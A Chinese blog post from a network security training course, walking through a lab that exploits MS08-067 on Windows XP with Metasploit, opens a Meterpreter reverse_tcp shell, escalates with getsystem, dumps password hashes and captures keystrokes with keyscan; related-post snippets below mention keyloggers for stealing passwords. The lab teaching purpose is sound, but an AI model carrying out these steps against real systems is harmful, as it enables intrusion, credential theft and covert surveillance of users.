3.6 Meterpreter 键盘记录

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量3.3k 收藏 14
点赞数 1
分类专栏: 网络攻击与防御实训 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/125950541
版权

目录

一、预备知识

1、Metasploit 框架介绍

2、渗透攻击基础

二、实验环境

三、实验步骤

一、预备知识

1、Metasploit 框架介绍

        Metasploit框架由库、接口和模块三部分组成,本实验关注的重点是各个接口和模块的功能。interface(控制台、CLI、Web、GUI等)为处理模块(漏洞利用、有效载荷、辅助工具、加密引擎、Nops等)提供操作接口。每个模块都有自己的价值,在渗透测试中起到不同的作用,具体如下:

        (1)漏洞利用。漏洞利用是一串验证性代码,主要针对目标系统的特定漏洞开发;

        (2)有效载荷。有效载荷是一段恶意代码,也有可能是漏洞验证程序的一部分,还可能是独立编译后用于在目标系统上运行的任意命令;

        (3)辅助工具。辅助工具是一个工具集,用于扫描、嗅探、区域拨号、获取指纹及其他安全评估任务。

        (4)加密引擎。开发用来加密渗透测试中的有效载荷,以对抗杀毒软件、防火墙、IDS/IPS及其他类似的反恶意软件的查杀;

        (5)NOP(空操作)。NOP是一个汇编指令,通常插入shellcode,不起任何作用,只是用来为有效载荷占位。

        Meterpreter是Metasploit框架中的一个功能模块,通常作为漏洞溢出后的攻击载荷来使用,攻击载荷能在触发漏洞后返回给攻击者一个控制通道。

2、渗透攻击基础

(1)msf>show exploit

        这个命令会显示Metasploit框架中所有可用的渗透攻击模块。

(2)msf>show auxiliary

        这个命令会显示所有的辅助模块以及它们的用途。

(3)msf>show options

        当你选择了一个模块,并输入msf>show options后,会列出这个模块所需的各种参数;如果你没有选择任何模块,那么该命令会显示所有的全局参数。

(4)msf>show payload

        与show optinos一样,当你在当前模块的命令提示符下输入show payload命令,Metasploit只会将与当前模块兼容的攻击载荷显示出来。

(5)msf>show targets

        Metasploit的渗透攻击受到目标操作系统的类型影响,该命令可以设置特定的系统版本。

二、实验环境

        攻击机:BackTrack 5 r3

        靶机:win xp sp3(English)

三、实验步骤

1、启动MSF Console;

2、攻击机与靶机互ping一下,保证两台主机的网络连通性;

3、用nmap扫描靶机,命令如下:nmap -sT -A --script=smb-check-vulns -PO <IP地址>;

         注:-sT是指隐秘的TCP连接扫描;-A是指高级操作系统探测功能,它会对一个特定服务进行更深入的旗标和指纹攫取;--script=smb-check-vulns为nmap的一个插件。

         由结果可知,靶机上存在一个ms08-067的漏洞。

4、输入“search ms08_067_netapi”命令,查询“ms08_067_netapi”的相关信息;

5、输入“use exploit/windows/smb/ms08_067_netapi”命令,加载这个模块(windows/smb/ms08_067_netapi);并设置攻击载荷为基于windows系统的Meterpreter reverse_tcp,这个载荷在攻击成功后,会从目标主机发起一个反弹连接,连接到LHOST中指定的IP地址(这种反弹可以让你绕过防火墙的入站流量保护,或者穿透NAT网关);

7、因为MS08-067是一个对操作系统版本依赖性很高的漏洞,因此我们在此用"show target"命令显示出这个特定漏洞渗透攻击模块所有可用的目标操作系统版本;

         注:攻击成功与否取决于目标主机的操作系统、安装的服务包(Service Pack)版本以及语言类型,同时还依赖是否成功绕过数据执行保护(DEP:Data Execution Prevention)。DEP是为了防止缓冲区溢出攻击而设计的,它将程序堆栈设计为只读,以防止shellcode被恶意放置在堆栈区并执行。

        NX(No Execute),不允许执行,即启动了DEP保护。

8、设置target:"set TARGET 6";设置靶机地址:“set RHOST <IP地址>”;

设置攻击机地址:“set LHOST <IP地址>”;设置攻击机监听的TCP端口号:“set PORT 8080”;

         注:设置端口参数:最好选择能通过防火墙的常用端口号。

9、输入“exploit”命令初始化攻击环境,并开始对目标进行攻击;

10、在“meterpreter>”后输入“help”命令,可以查看关于Meterpreter的详细使用方法说明;

11、执行完exploit命令后,就已经获得了一个Meterpreter shell。接下来获取系统权限,先执行“getdid”,获取系统的运行账户;

        输入“getsystem”命令获取系统权限,此外,也可以输入“getsystem -h”获取针对“getsystem”命令的详细使用方法;

 12、输入“sysinfo”命令,查看目标主机的信息;

 13、通过“run hashdump”命令,获取系统用户的Hash值;

14、Meterpreter还能记录目标主机的键盘输入信息。首先,输入“ps”命令,查看目标主机上运行的进程;

 15、输入“migrate 1588”启动explorer.exe;

16、继续运行“getuid”命令,可以看到已经具有Administrator权限;

 17、启动键盘记录命令“keyscan_start”,开始记录键盘信息;

        输入“keyscan_dump”,进行键盘输入信息的监听;

         在靶机上打开记事本随便输入一些字符, 在BT5上就可以获取键盘输入的信息了;

        输入“keysacn_stop”,停止键盘记录。

 四、实验中出现的问题:

        按照教材,不论是win xp的英文版、win xp的中文版以及windows server 2003中文版,都不能用ms03-026漏洞进行实验,会报错,如下图:

         解决方法:

                (1)操作系统用win xp英文版;

                (2)漏洞用ms08-067;

 

 

PT_silver
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
编程实现键盘记录功能
hxb002131的博客
03-28 5733
目录 1、安装python2.7 2、安装pycharm edu 3、安装完成之后进行相关库的安装 ​4、在pycharm中添加解释器 5、对键盘记录功能的代码 6、实验代码的运行 1、安装python2.7 (1)下载安装程序 下载链接如下:https://www.python.org/downloads/release/python-2712/ (2)打开上述链接,显示如下: 根据自己电脑配置进行选择,我的是win7 64位,所以我选择的是上述截图中红圈圈中的版本,点击左侧
maven3.6maven3.6maven3.6
09-04
Maven 3.6在生命周期管理上更加智能,错误处理和日志记录也更加详尽。 **多模块项目**是大型Java项目常见结构,Maven通过聚合项目轻松管理这些模块。在3.6版本中,多模块项目的构建性能得到提升,尤其是在并行构建...
后渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 8973
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
Windows网络服务渗透测试实战-Meterpreter后渗透
c_lanxiaofang的博客
05-17 2683
一、实验项目名称 Windows网络服务渗透测试实战-Meterpreter后渗透 二、实验目的及要求 掌握对MS17-010漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 三、复现步骤(附加文字说明加截图) 1、查看系统信息 屏幕快照 上传 下载 密码获取 Administrator:500:aad3b435b51404eeaad3b...
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4254
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 676
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
dhtmlx pro 3.6
09-27
**dhtmlx Pro 3.6 知识点详解** dhtmlx是一个强大的JavaScript库,专为构建富互联网应用程序(RIA)而设计。这个库包含了多种组件,如表格、树形视图、图表、日历等,使得开发者可以创建功能丰富的Web应用,无需...
llPdfLib3.6.rar
09-24
《llPdfLib3.6:Delphi中的PDF处理利器》 在软件开发中,尤其是在企业级应用中,生成和编辑PDF文档是一项常见的需求。llPdfLib3.6是一款专为Delphi开发者设计的PDF处理控件,它允许开发者在Delphi环境中轻松地进行...
Python3.6安装包
08-28
在CentOS7下安装的Python3.6安装包,此版本可以与CentOS7自带2.7.5共存。
用Python造一个键盘记录功能出来!
12-22
Py工具系列旨在用Python来编写黑客工具。《Python编写键盘记录功能》是该系列第一篇文章,希望你引起你的兴趣。在此系列的学习过程中,还希望你多能自己动手编写代码,动手实践! 键盘记录已经是很古老的黑客技术了,但正因其居高地位,直到现在还在不同层面上广泛使用。简单的来讲,键盘记录就是攻击者获取信息的一种方式。获取信息包括账号、密码、手机号等等敏感信息以及词汇。 Python之所以强大,是因为其有第三方库以及简单的语法等特点。键盘记录我们便可以使用第三方库pyHook。该库利用了Windows函数SetWindowsHookEx,这个函数允许我们自定义钩子函数!当特定的Windows事件
屏幕键盘记录精灵
04-03
可以配合暴力破解软件通过分析用户的各种操作键盘信息或者截屏内容在极短时间内破解用户密码、wifi等各种密码。
键盘管家(记录键盘的所有动作)
12-08
隐藏工作界面,会将你键盘上的所有操作记录在一个文件里面。你就可以方便的看到别人在你的机器上做了什么,但是也会记录密码。所以不能用作非法目的哦!
记录键盘输入
11-08
记录键盘输入字符记录键盘输入字符记录键盘输入字符记录键盘输入字符记录键盘输入字符记录键盘输入字符记录键盘输入字符
键盘记录查看者
12-12
键盘记录查看者 软件介绍: 能够将计算机用户的键盘输入及汉字输入全部记录下来。适用于所有应用程序,例如QQ,MSN, office,记事本,写字板,IE网页等任何键盘输入程序。广泛用于个人信息记录,家长对孩子的管教和企业对员工的工作监督,计算机教室,网吧的监控与管理。
llPDFLib 3.6 完整版 测试可以使用
03-17
**llPDFLib 3.6 全面解析** llPDFLib 是一款强大的 PDF 文档创建和编辑库,专为程序员设计,支持多种编程语言,包括 C++, .NET, VB, PHP 等。版本 3.6 提供了丰富的功能,使开发者能够轻松地在应用程序中生成、修改...
Metapreter 详细教程--进阶教程
qq_41245301的博客
12-29 989
我们发现是system权限,但是我们要的权限是LivingOnHope的权限,这是我们需要切换到LivingOnHope的进程中去通过migrate 命令执行,这里我们选择explorer.exe进程,这个进程是windows的外壳程序(管理桌面的程序如果关闭桌面将啥也没有了)windows的密码文件存放路径 C:\Windows\System32\config\SAM 密码存放在SAM文件中,在老的windows系统中用的是LM 加密方式 在新的系统中如win10win11等系统都是采用NTLM加密。
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4426
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
msfconsole后渗透指令
Yu3511606536的博客
02-26 2079
msfconsole后渗透利用
python 3.6
09-05
Python 3.6是一种编程语言,可以用于开发各种类型的应用程序,包括网站、桌面应用和数据分析等。安装Python 3.6的过程中,有一个重要的步骤是勾选"Add Python 3.6 to PATH",这样安装程序会自动配置环境变量,使计算机能够找到Python。如果没有勾选这个选项,你需要手动配置Python的环境变量。以下是Python 3.6的安装教程: 1. 首先,你需要下载Python 3.6的安装程序。你可以在Python官方网站上下载最新版本的Python 3.6安装程序。 2. 下载完成后,运行安装程序。在某个界面上,一定要勾选"Add Python 3.6 to PATH"选项。 3. 接下来,按照安装程序提供的指示完成Python 3.6的安装。安装过程中,你可以选择自定义安装选项,或者使用默认设置。 4. 安装完成后,你可以打开控制台(在Windows上可以使用快捷键Win+R,然后输入"cmd"),输入"python"命令来验证Python是否成功安装。如果显示了Python的详细信息,那么恭喜你,Python 3.6安装成功了! 请注意,如果你没有勾选"Add Python 3.6 to PATH"选项,你需要手动配置Python的环境变量。具体的环境变量配置教程可以参考相关资源。 综上所述,Python 3.6是一种编程语言,安装Python 3.6时需要勾选"Add Python 3.6 to PATH"选项,以便计算机能够找到Python。安装完成后,你可以打开控制台并输入"python"命令来验证安装是否成功。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [windows系统Python-3.6安装教程(保姆级教程)](https://blog.csdn.net/qq_41663505/article/details/127133913)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值